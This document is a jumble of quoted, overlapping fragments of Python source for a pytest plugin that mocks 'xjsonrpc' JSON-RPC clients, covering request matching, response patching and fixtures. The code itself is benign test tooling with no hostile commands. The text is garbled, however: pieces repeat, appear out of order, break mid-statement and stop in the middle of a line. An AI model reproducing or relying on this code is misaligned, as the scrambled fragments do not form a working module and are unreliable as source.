"result=match.response_data['result'], error=match.response_data['error'], ) def __enter__(self): self.start() return self def __exit__(self, exc_type, exc_val, exc_tb):", "id=id, result=result, error=error, callback=callback) self._matches[endpoint][(version, method_name)][idx] = match def remove(self, endpoint: str, method_name:", "patcher. \"\"\" self.reset() self._patcher.stop() def _cleanup_matches(self, endpoint: str, version: str = '2.0', method_name:", "None, idx: int = 0, ): \"\"\" Replaces a previously added response patch", "method_name)) self._cleanup_matches(endpoint, version, method_name) return result def reset(self) -> None: \"\"\" Removes all", ") if isinstance(params, (list, tuple)): stub(*params) else: stub(**params) if match.callback: if isinstance(params, (list,", "active patcher. \"\"\" self.reset() self._patcher.stop() def _cleanup_matches(self, endpoint: str, version: str = '2.0',", "def reset(self) -> None: \"\"\" Removes all added matches and reset call statistics.", "patched request id :param version: patched request version :param once: if ``True`` the", "**response_data: Any, ): self.endpoint = endpoint self.version = version self.method_name = method_name self.once", "request callback :param idx: patch index (if there are more than one) \"\"\"", "method_name: str, params: Optional[Union[list, dict]], id: Optional[Union[int, str]], ) -> Response: matches =", "None, ) -> None: \"\"\" Appends response patch. If the same method patch", "JSON-RPC client mocker. :param target: method to be mocked :param mocker: mocking package", "\"\"\" Stop an active patcher. \"\"\" self.reset() self._patcher.stop() def _cleanup_matches(self, endpoint: str, version:", "endpoint: str, method_name: str, result: UnsetType = UNSET, error: UnsetType = UNSET, id:", "<https://docs.pytest.org/en/latest/>`_ client library integration. Implements some utilities for mocking out ``xjsonrpc`` library clients.", "Incorporates request matching information. \"\"\" def __init__( self, endpoint: str, version: str, method_name:", "from typing import Any, Callable, Dict, Optional, Union import pytest import xjsonrpc from", "self._calls: Dict = collections.defaultdict(dict) @property def calls(self) -> Dict: \"\"\" Dictionary of JSON-PRC", "@property def calls(self) -> Dict: \"\"\" Dictionary of JSON-PRC method calls. \"\"\" return", "\"\"\" Removes all added matches and reset call statistics. \"\"\" self._matches.clear() for calls", "in a round-robin way. :param endpoint: request endpoint :param method_name: method name :param", "after the first call :param callback: patched request callback :param idx: patch index", "self._async_resp = True if self._async_resp: async def side_effect(*args, **kwargs): return await self._on_request(*args, **kwargs)", "matches.pop(0) if not match.once: matches.append(match) self._cleanup_matches(endpoint, version, method_name) stub = self.calls[endpoint].setdefault( (version, method_name),", "bool = False, **kwargs: Any): endpoint = origin_self._endpoint matches = self._matches.get(endpoint) if matches", "bool, callback: Optional[Callable], **response_data: Any, ): self.endpoint = endpoint self.version = version self.method_name", "self._cleanup_matches(endpoint, version, method_name) return result def reset(self) -> None: \"\"\" Removes all added", "callback: patched request callback :param idx: patch index (if there are more than", "pytest import xjsonrpc from xjsonrpc import Response from xjsonrpc.common import UNSET, UnsetType class", "def side_effect(*args, **kwargs): return await self._on_request(*args, **kwargs) else: def side_effect(*args, **kwargs): return self._on_request(*args,", "for calls in self._calls.values(): for stub in calls.values(): stub.reset_mock() self._calls.clear() def start(self): \"\"\"", "origin_self: Any, request_text: str, is_notification: bool = False, **kwargs: Any): endpoint = origin_self._endpoint", "self._patcher.temp_original(origin_self, request_text, is_notification, **kwargs) else: raise ConnectionRefusedError() json_data = json.loads(request_text) if isinstance(json_data, (list,", "calls. \"\"\" return self._calls def add( self, endpoint: str, method_name: str, result: UnsetType", "request.version, request.method, request.params, request.id) if self._async_resp: async def wrapper(): return json.dumps(response.to_json()) return wrapper()", "patched result :param error: patched error :param id: patched request id :param version:", "method_name)].append(match) def replace( self, endpoint: str, method_name: str, result: UnsetType = UNSET, error:", "\"\"\" patcher = self._mocker.patch(self._target) with patcher: if asyncio.iscoroutinefunction(patcher.temp_original): self._async_resp = True if self._async_resp:", "call statistics. \"\"\" self._matches.clear() for calls in self._calls.values(): for stub in calls.values(): stub.reset_mock()", "str, params: Optional[Union[list, dict]], id: Optional[Union[int, str]], ) -> Response: matches = self._matches[endpoint].get((version,", "ft import json import unittest.mock from typing import Any, Callable, Dict, Optional, Union", "request version :returns: removed response patch \"\"\" if method_name is None: result =", "# shortcuts PjRpcRequestsMocker = ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.requests.Client._request') PjRpcAiohttpMocker = ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.aiohttp.Client._request') @pytest.fixture def xjsonrpc_requests_mocker():", "endpoint: str, version: str, method_name: str, once: bool, callback: Optional[Callable], **response_data: Any, ):", "method_name: str, once: bool, callback: Optional[Callable], **response_data: Any, ): self.endpoint = endpoint self.version", "match def remove(self, endpoint: str, method_name: Optional[str] = None, version: str = '2.0'):", "exc_tb): self.stop() self.reset() # shortcuts PjRpcRequestsMocker = ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.requests.Client._request') PjRpcAiohttpMocker = ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.aiohttp.Client._request')", "as mocker: yield mocker @pytest.fixture def xjsonrpc_aiohttp_mocker(): \"\"\" Aiohttp client mocking fixture. \"\"\"", "error=error, callback=callback) self._matches[endpoint][(version, method_name)].append(match) def replace( self, endpoint: str, method_name: str, result: UnsetType", "response patch \"\"\" if method_name is None: result = self._matches.pop(endpoint) else: result =", "isinstance(params, (list, tuple)): stub(*params) else: stub(**params) if match.callback: if isinstance(params, (list, tuple)): result", "str, version: str, method_name: str, params: Optional[Union[list, dict]], id: Optional[Union[int, str]], ) ->", "method_name)][idx] = match def remove(self, endpoint: str, method_name: Optional[str] = None, version: str", "if not self._matches[endpoint]: self._matches.pop(endpoint) def _on_request(self, origin_self: Any, request_text: str, is_notification: bool =", "None: return xjsonrpc.Response(id=id, error=xjsonrpc.exc.MethodNotFoundError(data=method_name)) match = matches.pop(0) if not match.once: matches.append(match) self._cleanup_matches(endpoint, version,", "method_name), self._mocker.MagicMock(spec=lambda *args, **kwargs: None, name=f'{endpoint}:{version}:{method_name}'), ) if isinstance(params, (list, tuple)): stub(*params) else:", "callback: Optional[Callable] = None, ) -> None: \"\"\" Appends response patch. If the", "ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.requests.Client._request') PjRpcAiohttpMocker = ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.aiohttp.Client._request') @pytest.fixture def xjsonrpc_requests_mocker(): \"\"\" Requests client mocking", "xjsonrpc.Response( id=id or match.response_data['id'], result=match.response_data['result'], error=match.response_data['error'], ) def __enter__(self): self.start() return self def", "import Any, Callable, Dict, Optional, Union import pytest import xjsonrpc from xjsonrpc import", "= None self._async_resp = False self._passthrough = passthrough self._matches: Dict = collections.defaultdict(lambda: collections.defaultdict(list))", "return json.dumps(response.to_json()) return wrapper() else: return json.dumps(response.to_json()) def _match_request( self, endpoint: str, version:", "method to be mocked :param mocker: mocking package :param passthrough: pass not mocked", "Union import pytest import xjsonrpc from xjsonrpc import Response from xjsonrpc.common import UNSET,", "self._matches[endpoint]: self._matches.pop(endpoint) def _on_request(self, origin_self: Any, request_text: str, is_notification: bool = False, **kwargs:", "error :param id: patched request id :param version: patched request version :param once:", "return self._patcher.temp_original(origin_self, request_text, is_notification, **kwargs) else: raise ConnectionRefusedError() json_data = json.loads(request_text) if isinstance(json_data,", "out ``xjsonrpc`` library clients. \"\"\" import asyncio import collections import functools as ft", "result = self._matches.pop(endpoint) else: result = self._matches[endpoint].pop((version, method_name)) self._cleanup_matches(endpoint, version, method_name) return result", "else: raise ConnectionRefusedError() json_data = json.loads(request_text) if isinstance(json_data, (list, tuple)): response = xjsonrpc.BatchResponse()", "None: \"\"\" Removes all added matches and reset call statistics. \"\"\" self._matches.clear() for", ":param result: patched result :param error: patched error :param id: patched request id", "passthrough self._matches: Dict = collections.defaultdict(lambda: collections.defaultdict(list)) self._calls: Dict = collections.defaultdict(dict) @property def calls(self)", ":param idx: patch index (if there are more than one) \"\"\" match =", "params: Optional[Union[list, dict]], id: Optional[Union[int, str]], ) -> Response: matches = self._matches[endpoint].get((version, method_name))", "start(self): \"\"\" Activates a patcher. \"\"\" patcher = self._mocker.patch(self._target) with patcher: if asyncio.iscoroutinefunction(patcher.temp_original):", "if isinstance(params, (list, tuple)): result = match.callback(*params) else: result = match.callback(**params) return xjsonrpc.Response(id=id,", "if matches is None: return xjsonrpc.Response(id=id, error=xjsonrpc.exc.MethodNotFoundError(data=method_name)) match = matches.pop(0) if not match.once:", "self._async_resp: async def wrapper(): return json.dumps(response.to_json()) return wrapper() else: return json.dumps(response.to_json()) def _match_request(", "return xjsonrpc.Response(id=id, result=result) else: return xjsonrpc.Response( id=id or match.response_data['id'], result=match.response_data['result'], error=match.response_data['error'], ) def", "xjsonrpc_aiohttp_mocker(): \"\"\" Aiohttp client mocking fixture. \"\"\" with PjRpcAiohttpMocker() as mocker: yield mocker", "result = match.callback(**params) return xjsonrpc.Response(id=id, result=result) else: return xjsonrpc.Response( id=id or match.response_data['id'], result=match.response_data['result'],", "in self._calls.values(): for stub in calls.values(): stub.reset_mock() self._calls.clear() def start(self): \"\"\" Activates a", "self._matches[endpoint].get((version, method_name)) if matches is None: return xjsonrpc.Response(id=id, error=xjsonrpc.exc.MethodNotFoundError(data=method_name)) match = matches.pop(0) if", ":param passthrough: pass not mocked requests to the original method \"\"\" def __init__(self,", "once: bool = False, callback: Optional[Callable] = None, idx: int = 0, ):", "response patch. If the same method patch already exists they will be used", "version, method_name) stub = self.calls[endpoint].setdefault( (version, method_name), self._mocker.MagicMock(spec=lambda *args, **kwargs: None, name=f'{endpoint}:{version}:{method_name}'), )", "False, callback: Optional[Callable] = None, idx: int = 0, ): \"\"\" Replaces a", "= ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.requests.Client._request') PjRpcAiohttpMocker = ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.aiohttp.Client._request') @pytest.fixture def xjsonrpc_requests_mocker(): \"\"\" Requests client", "'2.0', once: bool = False, callback: Optional[Callable] = None, ) -> None: \"\"\"", "Match(endpoint, version, method_name, once, id=id, result=result, error=error, callback=callback) self._matches[endpoint][(version, method_name)][idx] = match def", "used in a round-robin way. :param endpoint: request endpoint :param method_name: method name", "object. Incorporates request matching information. \"\"\" def __init__( self, endpoint: str, version: str,", "Optional[Union[list, dict]], id: Optional[Union[int, str]], ) -> Response: matches = self._matches[endpoint].get((version, method_name)) if", "library integration. Implements some utilities for mocking out ``xjsonrpc`` library clients. \"\"\" import", "Any, ): self.endpoint = endpoint self.version = version self.method_name = method_name self.once =", "to be mocked :param mocker: mocking package :param passthrough: pass not mocked requests", "patched request callback :param idx: patch index (if there are more than one)", "Dict: \"\"\" Dictionary of JSON-PRC method calls. \"\"\" return self._calls def add( self,", "wrapper() else: return json.dumps(response.to_json()) def _match_request( self, endpoint: str, version: str, method_name: str,", "method_name, once, id=id, result=result, error=error, callback=callback) self._matches[endpoint][(version, method_name)].append(match) def replace( self, endpoint: str,", "\"\"\" self.reset() self._patcher.stop() def _cleanup_matches(self, endpoint: str, version: str = '2.0', method_name: Optional[str]", "if isinstance(params, (list, tuple)): stub(*params) else: stub(**params) if match.callback: if isinstance(params, (list, tuple)):", "-> None: \"\"\" Removes all added matches and reset call statistics. \"\"\" self._matches.clear()", "self.once = once self.callback = callback self.response_data = response_data class PjRpcMocker: \"\"\" Synchronous", "= self._matches[endpoint].get((version, method_name)) if matches is None: return xjsonrpc.Response(id=id, error=xjsonrpc.exc.MethodNotFoundError(data=method_name)) match = matches.pop(0)", "patcher = self._mocker.patch(self._target) with patcher: if asyncio.iscoroutinefunction(patcher.temp_original): self._async_resp = True if self._async_resp: async", "= xjsonrpc.Request.from_json(json_data) response = self._match_request(endpoint, request.version, request.method, request.params, request.id) if self._async_resp: async def", "not matches: self._matches[endpoint].pop((version, method_name), None) if not self._matches[endpoint]: self._matches.pop(endpoint) def _on_request(self, origin_self: Any,", "collections.defaultdict(list)) self._calls: Dict = collections.defaultdict(dict) @property def calls(self) -> Dict: \"\"\" Dictionary of", "= self._match_request(endpoint, request.version, request.method, request.params, request.id) if self._async_resp: async def wrapper(): return json.dumps(response.to_json())", "mocker @pytest.fixture def xjsonrpc_aiohttp_mocker(): \"\"\" Aiohttp client mocking fixture. \"\"\" with PjRpcAiohttpMocker() as", ":param once: if ``True`` the patch will be deleted after the first call", "as ft import json import unittest.mock from typing import Any, Callable, Dict, Optional,", "endpoint self.version = version self.method_name = method_name self.once = once self.callback = callback", "added response patch by a new one. :param endpoint: request endpoint :param method_name:", "Optional[Callable] = None, ) -> None: \"\"\" Appends response patch. If the same", "be mocked :param mocker: mocking package :param passthrough: pass not mocked requests to", "None: result = self._matches.pop(endpoint) else: result = self._matches[endpoint].pop((version, method_name)) self._cleanup_matches(endpoint, version, method_name) return", "is None: return xjsonrpc.Response(id=id, error=xjsonrpc.exc.MethodNotFoundError(data=method_name)) match = matches.pop(0) if not match.once: matches.append(match) self._cleanup_matches(endpoint,", "same method patch already exists they will be used in a round-robin way.", "None: if self._passthrough: return self._patcher.temp_original(origin_self, request_text, is_notification, **kwargs) else: raise ConnectionRefusedError() json_data =", "request matching information. \"\"\" def __init__( self, endpoint: str, version: str, method_name: str,", "response_data class PjRpcMocker: \"\"\" Synchronous JSON-RPC client mocker. :param target: method to be", "target self._mocker = mocker self._patcher = None self._async_resp = False self._passthrough = passthrough", "exists they will be used in a round-robin way. :param endpoint: request endpoint", "name :param result: patched result :param error: patched error :param id: patched request", "import xjsonrpc from xjsonrpc import Response from xjsonrpc.common import UNSET, UnsetType class Match:", "request = xjsonrpc.Request.from_json(json_data) response = self._match_request(endpoint, request.version, request.method, request.params, request.id) if self._async_resp: async", "yield mocker @pytest.fixture def xjsonrpc_aiohttp_mocker(): \"\"\" Aiohttp client mocking fixture. \"\"\" with PjRpcAiohttpMocker()", "= match.callback(**params) return xjsonrpc.Response(id=id, result=result) else: return xjsonrpc.Response( id=id or match.response_data['id'], result=match.response_data['result'], error=match.response_data['error'],", "def add( self, endpoint: str, method_name: str, result: UnsetType = UNSET, error: UnsetType", "are more than one) \"\"\" match = Match(endpoint, version, method_name, once, id=id, result=result,", "json.dumps(response.to_json()) def _match_request( self, endpoint: str, version: str, method_name: str, params: Optional[Union[list, dict]],", "if self._async_resp: async def side_effect(*args, **kwargs): return await self._on_request(*args, **kwargs) else: def side_effect(*args,", "import pytest import xjsonrpc from xjsonrpc import Response from xjsonrpc.common import UNSET, UnsetType", "self._matches: Dict = collections.defaultdict(lambda: collections.defaultdict(list)) self._calls: Dict = collections.defaultdict(dict) @property def calls(self) ->", "version: str, method_name: str, params: Optional[Union[list, dict]], id: Optional[Union[int, str]], ) -> Response:", "async def wrapper(): return json.dumps(response.to_json()) return wrapper() else: return json.dumps(response.to_json()) def _match_request( self,", "library clients. \"\"\" import asyncio import collections import functools as ft import json", "_cleanup_matches(self, endpoint: str, version: str = '2.0', method_name: Optional[str] = None) -> None:", "if ``True`` the patch will be deleted after the first call :param callback:", "method name :param version: JSON-RPC request version :returns: removed response patch \"\"\" if", "error: UnsetType = UNSET, id: Optional[Union[int, str]] = None, version: str = '2.0',", "Callable, Dict, Optional, Union import pytest import xjsonrpc from xjsonrpc import Response from", "Any): endpoint = origin_self._endpoint matches = self._matches.get(endpoint) if matches is None: if self._passthrough:", "match = matches.pop(0) if not match.once: matches.append(match) self._cleanup_matches(endpoint, version, method_name) stub = self.calls[endpoint].setdefault(", "call :param callback: patched request callback \"\"\" match = Match(endpoint, version, method_name, once,", "id: Optional[Union[int, str]] = None, version: str = '2.0', once: bool = False,", "reset(self) -> None: \"\"\" Removes all added matches and reset call statistics. \"\"\"", "import collections import functools as ft import json import unittest.mock from typing import", "a new one. :param endpoint: request endpoint :param method_name: method name :param result:", "is None: if self._passthrough: return self._patcher.temp_original(origin_self, request_text, is_notification, **kwargs) else: raise ConnectionRefusedError() json_data", "matches = self._matches[endpoint].get((version, method_name)) if matches is None: return xjsonrpc.Response(id=id, error=xjsonrpc.exc.MethodNotFoundError(data=method_name)) match =", "json.loads(request_text) if isinstance(json_data, (list, tuple)): response = xjsonrpc.BatchResponse() for request in xjsonrpc.BatchRequest.from_json(json_data): response.append(", "target: method to be mocked :param mocker: mocking package :param passthrough: pass not", ":param method_name: method name :param version: JSON-RPC request version :returns: removed response patch", "if match.callback: if isinstance(params, (list, tuple)): result = match.callback(*params) else: result = match.callback(**params)", "mocked :param mocker: mocking package :param passthrough: pass not mocked requests to the", "callback=callback) self._matches[endpoint][(version, method_name)][idx] = match def remove(self, endpoint: str, method_name: Optional[str] = None,", "endpoint: str, version: str = '2.0', method_name: Optional[str] = None) -> None: matches", "matching information. \"\"\" def __init__( self, endpoint: str, version: str, method_name: str, once:", "version: str = '2.0'): \"\"\" Removes a previously added response patch. :param endpoint:", "passthrough: bool = False): self._target = target self._mocker = mocker self._patcher = None", "id :param version: patched request version :param once: if ``True`` the patch will", ":param mocker: mocking package :param passthrough: pass not mocked requests to the original", "original method \"\"\" def __init__(self, target, mocker=unittest.mock, passthrough: bool = False): self._target =", "method patch already exists they will be used in a round-robin way. :param", "else: return json.dumps(response.to_json()) def _match_request( self, endpoint: str, version: str, method_name: str, params:", "= version self.method_name = method_name self.once = once self.callback = callback self.response_data =", "= False self._passthrough = passthrough self._matches: Dict = collections.defaultdict(lambda: collections.defaultdict(list)) self._calls: Dict =", "request.params, request.id), ) else: request = xjsonrpc.Request.from_json(json_data) response = self._match_request(endpoint, request.version, request.method, request.params,", "add( self, endpoint: str, method_name: str, result: UnsetType = UNSET, error: UnsetType =", "result=result, error=error, callback=callback) self._matches[endpoint][(version, method_name)][idx] = match def remove(self, endpoint: str, method_name: Optional[str]", "target='xjsonrpc.client.backend.aiohttp.Client._request') @pytest.fixture def xjsonrpc_requests_mocker(): \"\"\" Requests client mocking fixture. \"\"\" with PjRpcRequestsMocker() as", "client mocker. :param target: method to be mocked :param mocker: mocking package :param", "version self.method_name = method_name self.once = once self.callback = callback self.response_data = response_data", "xjsonrpc from xjsonrpc import Response from xjsonrpc.common import UNSET, UnsetType class Match: \"\"\"", "def __init__(self, target, mocker=unittest.mock, passthrough: bool = False): self._target = target self._mocker =", "unittest.mock from typing import Any, Callable, Dict, Optional, Union import pytest import xjsonrpc", "await self._on_request(*args, **kwargs) else: def side_effect(*args, **kwargs): return self._on_request(*args, **kwargs) self._patcher = self._mocker.patch(self._target,", "**kwargs) self._patcher = self._mocker.patch(self._target, side_effect=side_effect, autospec=True) return self._patcher.start() def stop(self) -> None: \"\"\"", "mocker=unittest.mock, passthrough: bool = False): self._target = target self._mocker = mocker self._patcher =", "self._matches[endpoint][(version, method_name)].append(match) def replace( self, endpoint: str, method_name: str, result: UnsetType = UNSET,", "= '2.0', method_name: Optional[str] = None) -> None: matches = self._matches[endpoint].get((version, method_name)) if", "method_name is None: result = self._matches.pop(endpoint) else: result = self._matches[endpoint].pop((version, method_name)) self._cleanup_matches(endpoint, version,", "= ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.aiohttp.Client._request') @pytest.fixture def xjsonrpc_requests_mocker(): \"\"\" Requests client mocking fixture. \"\"\" with", "they will be used in a round-robin way. :param endpoint: request endpoint :param", "after the first call :param callback: patched request callback \"\"\" match = Match(endpoint,", "version: JSON-RPC request version :returns: removed response patch \"\"\" if method_name is None:", "self._mocker.MagicMock(spec=lambda *args, **kwargs: None, name=f'{endpoint}:{version}:{method_name}'), ) if isinstance(params, (list, tuple)): stub(*params) else: stub(**params)", "JSON-RPC request version :returns: removed response patch \"\"\" if method_name is None: result", "passthrough: pass not mocked requests to the original method \"\"\" def __init__(self, target,", "fixture. \"\"\" with PjRpcRequestsMocker() as mocker: yield mocker @pytest.fixture def xjsonrpc_aiohttp_mocker(): \"\"\" Aiohttp", "callback: Optional[Callable], **response_data: Any, ): self.endpoint = endpoint self.version = version self.method_name =", "def stop(self) -> None: \"\"\" Stop an active patcher. \"\"\" self.reset() self._patcher.stop() def", "method_name)) if matches is None: return xjsonrpc.Response(id=id, error=xjsonrpc.exc.MethodNotFoundError(data=method_name)) match = matches.pop(0) if not", "once, id=id, result=result, error=error, callback=callback) self._matches[endpoint][(version, method_name)][idx] = match def remove(self, endpoint: str,", "\"\"\" Removes a previously added response patch. :param endpoint: request endpoint :param method_name:", "= self._mocker.patch(self._target, side_effect=side_effect, autospec=True) return self._patcher.start() def stop(self) -> None: \"\"\" Stop an", "None, name=f'{endpoint}:{version}:{method_name}'), ) if isinstance(params, (list, tuple)): stub(*params) else: stub(**params) if match.callback: if", "tuple)): result = match.callback(*params) else: result = match.callback(**params) return xjsonrpc.Response(id=id, result=result) else: return", "matches is None: if self._passthrough: return self._patcher.temp_original(origin_self, request_text, is_notification, **kwargs) else: raise ConnectionRefusedError()", "version: str = '2.0', method_name: Optional[str] = None) -> None: matches = self._matches[endpoint].get((version,", "str]], ) -> Response: matches = self._matches[endpoint].get((version, method_name)) if matches is None: return", "match.once: matches.append(match) self._cleanup_matches(endpoint, version, method_name) stub = self.calls[endpoint].setdefault( (version, method_name), self._mocker.MagicMock(spec=lambda *args, **kwargs:", "self._matches[endpoint].get((version, method_name)) if not matches: self._matches[endpoint].pop((version, method_name), None) if not self._matches[endpoint]: self._matches.pop(endpoint) def", "Stop an active patcher. \"\"\" self.reset() self._patcher.stop() def _cleanup_matches(self, endpoint: str, version: str", "self, endpoint: str, method_name: str, result: UnsetType = UNSET, error: UnsetType = UNSET,", ":param target: method to be mocked :param mocker: mocking package :param passthrough: pass", "= '2.0'): \"\"\" Removes a previously added response patch. :param endpoint: request endpoint", "async def side_effect(*args, **kwargs): return await self._on_request(*args, **kwargs) else: def side_effect(*args, **kwargs): return", "will be deleted after the first call :param callback: patched request callback \"\"\"", "return xjsonrpc.Response( id=id or match.response_data['id'], result=match.response_data['result'], error=match.response_data['error'], ) def __enter__(self): self.start() return self", "\"\"\" Requests client mocking fixture. \"\"\" with PjRpcRequestsMocker() as mocker: yield mocker @pytest.fixture", "stub = self.calls[endpoint].setdefault( (version, method_name), self._mocker.MagicMock(spec=lambda *args, **kwargs: None, name=f'{endpoint}:{version}:{method_name}'), ) if isinstance(params,", "calls(self) -> Dict: \"\"\" Dictionary of JSON-PRC method calls. \"\"\" return self._calls def", "xjsonrpc.Response(id=id, result=result) else: return xjsonrpc.Response( id=id or match.response_data['id'], result=match.response_data['result'], error=match.response_data['error'], ) def __enter__(self):", "\"\"\" `pytest <https://docs.pytest.org/en/latest/>`_ client library integration. Implements some utilities for mocking out ``xjsonrpc``", "= UNSET, id: Optional[Union[int, str]] = None, version: str = '2.0', once: bool", "mocker. :param target: method to be mocked :param mocker: mocking package :param passthrough:", "the same method patch already exists they will be used in a round-robin", "side_effect(*args, **kwargs): return await self._on_request(*args, **kwargs) else: def side_effect(*args, **kwargs): return self._on_request(*args, **kwargs)", "method_name self.once = once self.callback = callback self.response_data = response_data class PjRpcMocker: \"\"\"", "be used in a round-robin way. :param endpoint: request endpoint :param method_name: method", "\"\"\" Match object. Incorporates request matching information. \"\"\" def __init__( self, endpoint: str,", "response.append( self._match_request(endpoint, request.version, request.method, request.params, request.id), ) else: request = xjsonrpc.Request.from_json(json_data) response =", ":param method_name: method name :param result: patched result :param error: patched error :param", "PjRpcMocker: \"\"\" Synchronous JSON-RPC client mocker. :param target: method to be mocked :param", "self._patcher = self._mocker.patch(self._target, side_effect=side_effect, autospec=True) return self._patcher.start() def stop(self) -> None: \"\"\" Stop", "endpoint = origin_self._endpoint matches = self._matches.get(endpoint) if matches is None: if self._passthrough: return", "= xjsonrpc.BatchResponse() for request in xjsonrpc.BatchRequest.from_json(json_data): response.append( self._match_request(endpoint, request.version, request.method, request.params, request.id), )", "mocker: mocking package :param passthrough: pass not mocked requests to the original method", "= method_name self.once = once self.callback = callback self.response_data = response_data class PjRpcMocker:", "will be used in a round-robin way. :param endpoint: request endpoint :param method_name:", "method_name, once, id=id, result=result, error=error, callback=callback) self._matches[endpoint][(version, method_name)][idx] = match def remove(self, endpoint:", "patched request callback \"\"\" match = Match(endpoint, version, method_name, once, id=id, result=result, error=error,", "bool = False, callback: Optional[Callable] = None, idx: int = 0, ): \"\"\"", "clients. \"\"\" import asyncio import collections import functools as ft import json import", "self._target = target self._mocker = mocker self._patcher = None self._async_resp = False self._passthrough", "None) if not self._matches[endpoint]: self._matches.pop(endpoint) def _on_request(self, origin_self: Any, request_text: str, is_notification: bool", "return self._patcher.start() def stop(self) -> None: \"\"\" Stop an active patcher. \"\"\" self.reset()", "**kwargs) else: raise ConnectionRefusedError() json_data = json.loads(request_text) if isinstance(json_data, (list, tuple)): response =", "patch. If the same method patch already exists they will be used in", "mocking package :param passthrough: pass not mocked requests to the original method \"\"\"", "isinstance(json_data, (list, tuple)): response = xjsonrpc.BatchResponse() for request in xjsonrpc.BatchRequest.from_json(json_data): response.append( self._match_request(endpoint, request.version,", "*args, **kwargs: None, name=f'{endpoint}:{version}:{method_name}'), ) if isinstance(params, (list, tuple)): stub(*params) else: stub(**params) if", "\"\"\" def __init__(self, target, mocker=unittest.mock, passthrough: bool = False): self._target = target self._mocker", "method_name: Optional[str] = None) -> None: matches = self._matches[endpoint].get((version, method_name)) if not matches:", "self, endpoint: str, version: str, method_name: str, once: bool, callback: Optional[Callable], **response_data: Any,", "dict]], id: Optional[Union[int, str]], ) -> Response: matches = self._matches[endpoint].get((version, method_name)) if matches", "Optional[str] = None) -> None: matches = self._matches[endpoint].get((version, method_name)) if not matches: self._matches[endpoint].pop((version,", "mocked requests to the original method \"\"\" def __init__(self, target, mocker=unittest.mock, passthrough: bool", "= '2.0', once: bool = False, callback: Optional[Callable] = None, ) -> None:", "else: result = self._matches[endpoint].pop((version, method_name)) self._cleanup_matches(endpoint, version, method_name) return result def reset(self) ->", "self._patcher.stop() def _cleanup_matches(self, endpoint: str, version: str = '2.0', method_name: Optional[str] = None)", "= True if self._async_resp: async def side_effect(*args, **kwargs): return await self._on_request(*args, **kwargs) else:", "str, method_name: Optional[str] = None, version: str = '2.0'): \"\"\" Removes a previously", "self def __exit__(self, exc_type, exc_val, exc_tb): self.stop() self.reset() # shortcuts PjRpcRequestsMocker = ft.partial(PjRpcMocker,", "way. :param endpoint: request endpoint :param method_name: method name :param result: patched result", ") -> Response: matches = self._matches[endpoint].get((version, method_name)) if matches is None: return xjsonrpc.Response(id=id,", "id=id or match.response_data['id'], result=match.response_data['result'], error=match.response_data['error'], ) def __enter__(self): self.start() return self def __exit__(self,", "def __enter__(self): self.start() return self def __exit__(self, exc_type, exc_val, exc_tb): self.stop() self.reset() #", "xjsonrpc.Request.from_json(json_data) response = self._match_request(endpoint, request.version, request.method, request.params, request.id) if self._async_resp: async def wrapper():", "result = match.callback(*params) else: result = match.callback(**params) return xjsonrpc.Response(id=id, result=result) else: return xjsonrpc.Response(", "self._matches.pop(endpoint) def _on_request(self, origin_self: Any, request_text: str, is_notification: bool = False, **kwargs: Any):", "from xjsonrpc.common import UNSET, UnsetType class Match: \"\"\" Match object. Incorporates request matching", "\"\"\" if method_name is None: result = self._matches.pop(endpoint) else: result = self._matches[endpoint].pop((version, method_name))", "self._async_resp: async def side_effect(*args, **kwargs): return await self._on_request(*args, **kwargs) else: def side_effect(*args, **kwargs):", "= origin_self._endpoint matches = self._matches.get(endpoint) if matches is None: if self._passthrough: return self._patcher.temp_original(origin_self,", "_match_request( self, endpoint: str, version: str, method_name: str, params: Optional[Union[list, dict]], id: Optional[Union[int,", "new one. :param endpoint: request endpoint :param method_name: method name :param result: patched", "once self.callback = callback self.response_data = response_data class PjRpcMocker: \"\"\" Synchronous JSON-RPC client", "match.callback: if isinstance(params, (list, tuple)): result = match.callback(*params) else: result = match.callback(**params) return", "id: patched request id :param version: patched request version :param once: if ``True``", "result :param error: patched error :param id: patched request id :param version: patched", "asyncio import collections import functools as ft import json import unittest.mock from typing", "endpoint: request endpoint :param method_name: method name :param version: JSON-RPC request version :returns:", "request endpoint :param method_name: method name :param version: JSON-RPC request version :returns: removed", "version, method_name, once, id=id, result=result, error=error, callback=callback) self._matches[endpoint][(version, method_name)][idx] = match def remove(self,", "for stub in calls.values(): stub.reset_mock() self._calls.clear() def start(self): \"\"\" Activates a patcher. \"\"\"", ":param version: patched request version :param once: if ``True`` the patch will be", "match.response_data['id'], result=match.response_data['result'], error=match.response_data['error'], ) def __enter__(self): self.start() return self def __exit__(self, exc_type, exc_val,", "collections.defaultdict(lambda: collections.defaultdict(list)) self._calls: Dict = collections.defaultdict(dict) @property def calls(self) -> Dict: \"\"\" Dictionary", "version: str, method_name: str, once: bool, callback: Optional[Callable], **response_data: Any, ): self.endpoint =", "(list, tuple)): stub(*params) else: stub(**params) if match.callback: if isinstance(params, (list, tuple)): result =", "patch already exists they will be used in a round-robin way. :param endpoint:", "not self._matches[endpoint]: self._matches.pop(endpoint) def _on_request(self, origin_self: Any, request_text: str, is_notification: bool = False,", "UnsetType class Match: \"\"\" Match object. Incorporates request matching information. \"\"\" def __init__(", "first call :param callback: patched request callback :param idx: patch index (if there", "self._cleanup_matches(endpoint, version, method_name) stub = self.calls[endpoint].setdefault( (version, method_name), self._mocker.MagicMock(spec=lambda *args, **kwargs: None, name=f'{endpoint}:{version}:{method_name}'),", "self._on_request(*args, **kwargs) self._patcher = self._mocker.patch(self._target, side_effect=side_effect, autospec=True) return self._patcher.start() def stop(self) -> None:", "self.reset() # shortcuts PjRpcRequestsMocker = ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.requests.Client._request') PjRpcAiohttpMocker = ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.aiohttp.Client._request') @pytest.fixture def", "return self._calls def add( self, endpoint: str, method_name: str, result: UnsetType = UNSET,", "from xjsonrpc import Response from xjsonrpc.common import UNSET, UnsetType class Match: \"\"\" Match", "once, id=id, result=result, error=error, callback=callback) self._matches[endpoint][(version, method_name)].append(match) def replace( self, endpoint: str, method_name:", "if isinstance(json_data, (list, tuple)): response = 